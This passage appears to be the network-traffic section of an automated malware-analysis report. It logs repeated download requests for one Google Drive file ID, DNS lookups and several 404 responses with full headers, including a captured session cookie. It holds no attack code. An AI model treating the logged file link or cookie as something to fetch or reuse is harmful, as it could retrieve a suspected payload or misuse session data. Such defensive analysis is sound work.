      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /download?id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q&export=download HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Cache-Control: no-cacheHost: drive.usercontent.google.comConnection: Keep-AliveCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficHTTP traffic detected: GET /uc?export=download&id=1-RtAp06kG9CDQig9xIBW7Tm3axNeL10q HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:121.0) Gecko/20100101 Firefox/121.0Host: drive.google.comCache-Control: no-cacheCookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ
      Source: global trafficDNS traffic detected: DNS query: drive.google.com
      Source: global trafficDNS traffic detected: DNS query: drive.usercontent.google.com
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:43:52 GMTP3P: CP="This is not a P3P policy! See g.co/p3phelp for more info."Permissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-ABLVDx_RIDQIwWAxcW5SDQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC6N0MqpgTr3mXmL3BvIcKc5K-Bnu30U2byoJ1Vhe3LDKvgHB3raoW9g6t0fNZAPw31eIc2ebdjcVgServer: UploadServerSet-Cookie: NID=519=LLQojtVi2pKr6rMBkmNLlffSR6jSLRzuEMI5rA4gYcZXQ6sc8Bv34NqZGkNHSYuSgO5GFiO5vI8w016OWXoj_RQ69liSzs8hcUr8DM9ohvhWVs6AK62uy5AJFkLBsLM9NrvLmM0Hm317En2cy2k7oWQ868AqxH3NS_JstsNSn5WmRA9KxnfyLJLZ; expires=Wed, 04-Jun-2025 15:43:52 GMT; path=/; domain=.google.com; Secure; HttpOnly; SameSite=noneAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:43:58 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Cross-Origin-Opener-Policy: same-originContent-Security-Policy: script-src 'nonce-U_DTX1rNqJiHhLT7MhQq7g' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC7FRv6YdSB9wL2xR-zxuYwWjCyK_34fidWYGc4vRRF5NUJOb5b2SMf_0R2FzYY-tXDI_P7qxYvwrQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:03 GMTAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: script-src 'nonce-QcdGmAdYilxKAr-VRYYgHg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC7_P4xXhXBDLn0pqycST3WC2yXWEcpb6KiyW0aQ677lJcxTLOFygHUCqcS513hg462eiJxiFvunwgServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:09 GMTPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-ejXqSIwE6xFF7rTC1_CalA' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistCross-Origin-Opener-Policy: same-originAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistContent-Length: 1652X-GUploader-UploadID: AFiumC6uaC23Ma87UXoh5ekwYA0hY1YFZdrpS8UJd3mIwLOBoZTS811bIJMxthX9xKGLVyexoErtes0QzQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:14 GMTContent-Security-Policy: script-src 'nonce-V5Ij825rmG2bwoh83j-dNQ' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionCross-Origin-Opener-Policy: same-originContent-Length: 1652X-GUploader-UploadID: AFiumC446h0B54JEKRl6s_XXFGV2nxauNGZgaI2Past7Bhj_e71JAiseBFgNJPtSM-tYnulggu5z_hNrHAServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:20 GMTCross-Origin-Opener-Policy: same-originContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy: script-src 'nonce-rlOwPRkDZBH0TkiNGCdZtw' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Content-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistAccept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, Sec-CH-UA-Platform-VersionContent-Length: 1652X-GUploader-UploadID: AFiumC4cghIbPf3v61Nm6YOYT51i1FWU0xnwAdgZco3ZcxE6ALyNXzd4yvSzToemjc3PPQrb-FvG32cYmQServer: UploadServerAlt-Svc: h3=":443"; ma=2592000,h3-29=":443"; ma=2592000Content-Security-Policy: sandbox allow-scriptsConnection: close
      Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundContent-Type: text/html; charset=utf-8Cache-Control: no-cache, no-store, max-age=0, must-revalidatePragma: no-cacheExpires: Mon, 01 Jan 1990 00:00:00 GMTDate: Tue, 03 Dec 2024 15:44:25 GMTContent-Security-Policy: script-src 'nonce-MmCWXCiBn911DADyFXUfwg' 'unsafe-inline';object-src 'none';base-uri 'self';report-uri /_/DriveUntrustedContentHttp/cspreport;worker-src 'self'Content-Security-Policy: script-src 'unsafe-inline' 'unsafe-eval' blob: data: 'self' https://apis.google.com https://ssl.gstatic.com https://www.google.com https://www.googletagmanager.com https://www.gstatic.com https://www.google-analytics.com;report-uri /_/DriveUntrustedContentHttp/cspreport/allowlistContent-Security-Policy: require-trusted-types-for 'script';report-uri /_/DriveUntrustedContentHttp/cspreportContent-Security-Policy-Report-Only: script-src 'unsafe-inline' 'unsafe-eval' blob: data: https://translate.google.com/translate_a/element.js https://www.google-analytics.com/analytics.js https://translate.googleapis.com/_/translate_http/_/js/;report-uri /_/DriveUntrustedContentHttp/cspreport/fine-allowlistPermissions-Policy: ch-ua-arch=*, ch-ua-bitness=*, ch-ua-full-version=*, ch-ua-full-version-list=*, ch-ua-model=*, ch-ua-wow64=*, ch-ua-form-factors=*, ch-ua-platform=*, ch-ua-platform-version=*Accept-CH: Sec-CH-UA-Arch, Sec-CH-UA-Bitness, Sec-CH-UA-Full-Version, Sec-CH-UA-Full-Version-List, Sec-CH-UA-Model, Sec-CH-UA-WoW64, Sec-CH-UA-Form-Factors, Sec-CH-UA-Platform, 